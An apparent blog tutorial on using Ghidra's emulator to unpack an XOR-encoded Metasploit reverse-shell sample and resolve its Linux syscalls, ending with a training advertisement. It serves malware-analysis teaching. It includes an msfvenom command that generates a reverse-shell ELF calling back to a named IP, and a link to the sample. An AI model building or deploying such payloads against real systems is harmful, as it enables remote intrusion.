Unpacking Shellcode with Ghidra Emulator

Craig Young
5 min readJun 4, 2023

--

It is a pretty common practice for malware authors to decode and execute payloads in memory to avoid detection and complicate analysis efforts. In this post, I will decode and start analyzing an XOR encoded Metasploit TCP reverse shell to give an example on how to get started with this using Ghidra to emulate the payload.

The sample for this post can be downloaded from https://secur3.us/GhidraFiles/payload or can be generated with msfvenom:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=104.236.191.89 -f elf -e x64/xor

The exercise begins by creating a new project in Ghidra and importing the sample file.

Import using the discovered properties

Opening the program in CodeBrowser and performing auto-analysis reveals the following listing:

Memory starting 0x40009f is re-written from XOR on 0x400093

Reading through this listing, we can see that it is loading the address of the entry function into RAX and then writing XOR results into a location 0x27 bytes into entry at 0x400093. We can see that 0x400078+0x27 brings us to 0x40009f which has already been flagged by Ghidra with a RW reference from the xor instruction at 0x400093. The decompiler output shows something similar and indicates that it encountered bad instruction data:

Decompiled entry has bad instructions

The program will run an XOR decoding loop to rewrite the program at runtime. This will transform those bad bytes into valid instructions. With this understanding of the code, we can open the program in the stand-alone Emulator tool and allow it to run the XOR loop by clicking Debugger->Emulate Program in New Trace (or by clicking the emulator icon).

Emulator started for entry

The plan from here is to let it run through the decoding loop and then inspect the dynamic listing. Set an SW_EXECUTE breakpoint at 0x40009f to recognize when the loop has completed.

Press ‘k’ to set a breakpoint after the loop

After setting the breakpoint, use the Emulator controls to resume execution (the resume/play icon works) and you should see control reach the breakpoint.

Static Listing at Breakpoint

Switching to the Dynamic listing at this point (Window->Listing->Dynamic) shows that the bytes have been re-written.

Decoded instructions after XOR loop

We can now extract the decoded data into a program segment for independent analysis. This is achieved by highlighting the bytes and then using the Extract and Import… option in the right-click context menu from the selected bytes.

Extracting decoded bytes

Notice that the dialogue asks, ‘Please select a language.’ This gives us the opportunity to select an alternate language selection for the extracted code.

Select a Language

I have selected the little-endian 64-bit x86 with gcc but of course we know that this was not compiled by gcc. Other lanaguage selections here may improve or degrade your analysis output.

Import parameters

After clicking OK on this prompt, click Yes to analyze the new segment:

Click Yes to analyze

The new segment is now included in the Ghidra project in a subfolder named after the program (payload).

Payload segment Listing

Disassemble this by pressing ‘D’ to reveal the shellcode:

Shellcode listing

And then in the Decompile view:

Decompiled shellcode

The shellcode is using the SYSCALL instruction which is represented in Ghidra’s decompiler output as the generic syscall() instead of resolving to the specific Linux system call invoked. The decompiled view in this case does not contain enough information to understand the deobfuscated code. Fortunately, Ghidra ships with an example script demonstrating how to use a memory overlay to resolve syscall numbers to function placeholders so that we see appropriate names and signatures instead of syscall().

Open Script Manager from the Window menu and search for ‘SyscallsScript’ to find it:

Find ‘ResolveX86orX64LinuxSyscallsScript.java’ in Script Manager

Unfortunately, this script was not designed to be run on a program segment and does not like the available metadata. If you run the script you will get an error as follows:

Error when running unmodified script

Right-click the script and open it in the basic editor to apply a quick patch by commenting out the check as shown in the highlighted section below.

Comment out the check for a Linux program

After adding the comments, you will need to save the script as a new name before it can be run:

Save the script with a new name

Running the updated script and returning to the decompiled segment output, we see:

Decoded shellcode with syscalls resolved

I will leave the rest of the analysis to the reader, but from here we can already see that the 4 syscalls have been renamed and given appropriate signatures for socket, connect, dup2, and execve which should give a pretty clear indication of what it is doing.

Join Me At Black Hat To Learn More

As always, I hope you have enjoyed reading this post. If you found this interesting and want to learn more, please consider joining me in Vegas this summer for ‘A Guide to Reversing with Ghidra’. The class is offered twice, Saturday/Sunday and Monday/Tuesday. Spaces are filling up quickly so please reserve your space today!

Weekend Class Registration

Monday/Tuesday Registration

UPDATE 3/2/24: Registration is currently open for “A Basic Guide to Bug Hunting with Ghidra” at Black Hat USA 2024. The two day class will be offered August 3–4 and again August 5–6.

--

--

Craig Young

I’m a 15-year veteran of the infosec industry with 200+ CVEs, two USENIX papers, a Pwnie award, and a bunch of bounties to my name. Currently teaching Ghidra.